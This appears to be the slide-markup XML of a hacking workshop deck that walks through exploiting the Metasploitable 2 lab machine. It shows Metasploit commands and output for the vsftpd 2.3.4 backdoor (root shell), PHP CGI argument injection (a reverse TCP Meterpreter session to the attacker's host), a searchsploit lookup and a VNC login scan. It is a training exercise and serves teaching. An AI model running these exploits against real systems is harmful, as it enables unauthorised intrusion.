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Montserrat"/>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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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924872daa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924872daa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7924872daa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924872daa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7924872daa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924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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7924872daa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metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/comprehensive-guide-on-metasploitable-2/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploitable3"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www.exploit-db.com/searchsploit" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.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hyperlink" Target="http://kali.org/downloads" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bit.ly/2rgsfBI"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csoonline.com/article/3379117/what-is-metasploit-and-how-to-use-this-popular-hacking-tool.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Break the Things</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🍕Don’t forget to sign in!🍕</a:t>
            </a:r>
            <a:endParaRPr i="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Breaking vsftpd v2.3.4 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Google Shape;190;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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(Within Metasploit Console)</a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>use exploit/unix/ftp/vsftpd_234_backdoor </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msf5 exploit(unix/ftp/vsftpd_234_backdoor) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>set RHOST 172.16.63.132</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>RHOST =&gt; 172.16.63.132</a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msf5 exploit(unix/ftp/vsftpd_234_backdoor) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] 172.16.63.132:21 - Banner: 220 (vsFTPd 2.3.4)</a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] 172.16.63.132:21 - USER: 331 Please specify the password.</a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[+] 172.16.63.132:21 - Backdoor service has been spawned, handling...</a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[+] 172.16.63.132:21 - UID: uid=0(root) gid=0(root)</a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] Found shell.</a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] Command shell session 1 opened (172.16.63.133:38415 -&gt; 172.16.63.132:6200) at 2019-11-22 04:40:41 </a:t>
            </a:r>
            <a:endParaRPr>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
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>whoami;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Root        ←bamboozled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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Breaking PHP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;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(Referencing last nmap service results)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>|_http-title: Metasploitable2 - Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Looking into the web server, phpinfo is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>lets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> us know the version is:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1350">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="9999CC"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197" name="Google Shape;197;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704975" y="3735800"/>
            <a:ext cx="5734050" cy="742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Breaking PHP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1567550"/>
            <a:ext cx="3403200" cy="1004100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PHP Version 5.2.4-2ubuntu5.10, is it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">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spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="2499325"/>
            <a:ext cx="4692000" cy="216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root@kali:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>searchsploit php | grep 5.2.4</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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ILIAS &lt; 5.2.4 - Cross-Site Scripting  | exploits/php/webapps/43595.txt</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Joomla! Component BookLibrary 1.5.2.4 | exploits/php/webapps/8908.txt</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PHP 5.2.4 ionCube - 'ioncube_read_fil | exploits/windows/local/4517.php</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PHP Pro Bid 5.2.4 - 'auctionsearch.ph | exploits/php/webapps/28274.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637575" y="812250"/>
            <a:ext cx="2911200" cy="193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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>PHP Pro Bid 5.2.4 - 'categories.php?o | exploits/php/webapps/28276.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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00">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>PHP Pro Bid 5.2.4 - 'viewfeedback.php | exploits/php/webapps/28275.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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00">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>PHP Pro Bid 5.2.4/6.04 - Multiple SQL | exploits/php/webapps/32397.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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00">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>QNAP PhotoStation 5.2.4 / MusicStatio | exploits/php/webapps/41988.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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00">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>root@kali:~# </a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Breaking PHP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p2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a:t>Within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Metasploit Console)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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>use exploit/multi/http/php_cgi_arg_injection</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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msf5 exploit(multi/http/php_cgi_arg_injection) &gt;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msf5 exploit(multi/http/php_cgi_arg_injection) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>set RHOST 172.16.63.132</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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RHOST =&gt; 172.16.63.132</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msf5 exploit(multi/http/php_cgi_arg_injection) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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Started reverse TCP handler on 172.16.63.133:4444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Sending stage (38247 bytes) to 172.16.63.132</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[*] Meterpreter session 1 opened (172.16.63.133:4444 -&gt; 172.16.63.132:33951) at 2019-11-22 05:17:17 +0000</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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meterpreter &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="12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Breaking VNC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p2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(Referencing nmap service scan) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>5900/tcp open  vnc         VNC (protocol 3.3)</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vnc-info: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Protocol version: 3.3</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Security types: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|_    VNC Authentication (2)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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Breaking VNC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p2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msf5 &gt; use auxiliary/scanner/vnc/vnc_login </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
